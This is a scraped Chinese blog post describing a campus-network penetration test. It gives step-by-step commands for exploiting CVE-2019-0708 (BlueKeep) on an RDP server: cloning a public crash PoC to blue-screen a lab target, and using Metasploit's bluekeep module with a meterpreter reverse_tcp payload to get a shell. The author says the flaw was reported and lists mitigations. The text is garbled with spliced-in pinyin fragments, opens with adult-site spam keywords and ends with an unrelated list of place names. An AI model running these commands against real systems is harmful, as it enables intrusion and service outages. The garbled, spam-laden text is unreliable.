最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

記一次校園網(wǎng)滲透測(cè)試

2023-03-03 00:01 作者:悲匠  | 我要投稿

ps:發(fā)文前已將漏洞反饋至校園信息中心,菜雞投稿,如有不對(duì)的地方還請(qǐng)各位大佬指正

設(shè)備連接校園網(wǎng)跳轉(zhuǎn)到了銳捷校園網(wǎng)認(rèn)證界面

得到校園網(wǎng)服務(wù)器地址:10.25.254.11

通過(guò)nmap工具掃描端口發(fā)現(xiàn)以下端口開放

發(fā)現(xiàn)服務(wù)器的3389端口開放,推測(cè)3389端口可能存在 cve-2019-0708漏洞

利用msf工具進(jìn)行掃描,發(fā)現(xiàn)服務(wù)器確實(shí)存在該漏洞,通過(guò)該漏洞我們可以獲取服務(wù)器控制權(quán)或?qū)Ψ?wù)器發(fā)起藍(lán)屏攻擊,使服務(wù)器癱瘓,或獲取服務(wù)器shell。

1.對(duì)服務(wù)器發(fā)動(dòng)藍(lán)屏攻擊(本次攻擊未攻擊校園網(wǎng)服務(wù)器,搭建了相同環(huán)境的靶機(jī)進(jìn)行測(cè)試)

使用漏洞利用工具:git clone https://github.com/n1xbyte/CVE-2019-0708.git

下載完后使用命令 crashpoc.py 192.168.1.108 64 //crashpoc.py 目標(biāo)ip

運(yùn)行工具后靶機(jī)藍(lán)屏

2.利用該漏洞獲取目標(biāo)shell

使用exploit/windows/rdp/cve_2019_0708_bluekeep_rce漏洞模塊

輸入命令use?exploit/windows/rdp/cve_2019_0708_bluekeep_rce


設(shè)置目標(biāo):輸入命令set rhosts 192.168.1.108

使用payload:輸入命令set payload windows/x64/meterpreter/reverse_tcp

設(shè)置主機(jī)架構(gòu):set target 2


執(zhí)行,獲取服務(wù)器shell

獲取服務(wù)器shell后就可以為所欲為了,校園網(wǎng)認(rèn)證服務(wù)器開放的其它端口也存在一些漏洞,目前已將漏洞反饋至校園信息中心,本次滲透未影響服務(wù)器正常運(yùn)行


解決方案:

1.在運(yùn)行受支持版本的 Windows 7、Windows Server 2008 和 Windows Server 2008 R2 的系統(tǒng)上啟用網(wǎng)絡(luò)級(jí)身份驗(yàn)證 (NLA)

2.在企業(yè)邊界防火墻處阻止 TCP 端口 3389


記一次校園網(wǎng)滲透測(cè)試的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國(guó)家法律
克拉玛依市| 扶风县| 东乡族自治县| 南召县| 商水县| 三明市| 乐山市| 卓尼县| 湘阴县| 扬中市| 崇礼县| 哈巴河县| 海宁市| 武邑县| 丁青县| 宣恩县| 苏尼特左旗| 达尔| 马山县| 珲春市| 奎屯市| 汝南县| 射洪县| 阜新市| 麻江县| 双城市| 建阳市| 天津市| 商城县| 万年县| 江孜县| 凌源市| 钦州市| 台湾省| 镇赉县| 奈曼旗| 长垣县| 遂溪县| 拉萨市| 永济市| 宁波市|